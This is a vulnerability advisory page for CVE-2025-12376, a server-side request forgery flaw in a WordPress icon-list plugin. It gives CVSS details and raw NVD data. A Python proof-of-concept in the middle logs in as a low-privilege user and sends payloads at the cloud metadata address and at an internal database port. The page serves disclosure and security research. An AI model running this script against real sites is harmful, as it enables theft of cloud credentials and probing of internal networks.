Security Vulnerability Report
中文
CVE-2025-12376 CVSS 6.4 MEDIUM

CVE-2025-12376

Published: 2025-11-18 15:16:26
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Icon List Block – Add Icon-Based Lists with Custom Styles plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.2.1 via the fs_api_request function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. Only valid JSON objects are rendered in the response.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Icon List Block插件 ≤ 1.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12376 PoC - WordPress Icon List Block SSRF # Authenticated Subscriber+ required import requests import json target_url = "http://target-wordpress-site.com" wp_user = "attacker" wp_pass = "password123" # Login to WordPress to get authentication cookies session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": wp_user, "pwd": wp_pass, "wp-submit": "Log In" } # Get nonce for AJAX request session.post(login_url, data=login_data) # PoC 1: Access AWS metadata service ssrf_payload = { "action": "fs_api_request", "url": "http://169.254.169.254/latest/meta-data/" } # Alternative PoC: Internal port scanning ssrf_payload_portscan = { "action": "fs_api_request", "url": "http://localhost:3306/" } # Send malicious request ajax_url = f"{target_url}/wp-admin/admin-ajax.php" response = session.post(ajax_url, data=ssrf_payload) print(f"Status: {response.status_code}") print(f"Response: {response.text}") # Note: Only valid JSON responses are rendered

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12376", "sourceIdentifier": "[email protected]", "published": "2025-11-18T15:16:26.140", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Icon List Block – Add Icon-Based Lists with Custom Styles plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.2.1 via the fs_api_request function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. Only valid JSON objects are rendered in the response."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/icon-list-block/tags/1.2.0/bplugins_sdk/inc/Base/FSActivate.php#L168", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/438e2911-7663-44fe-883f-19ad29972aac?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.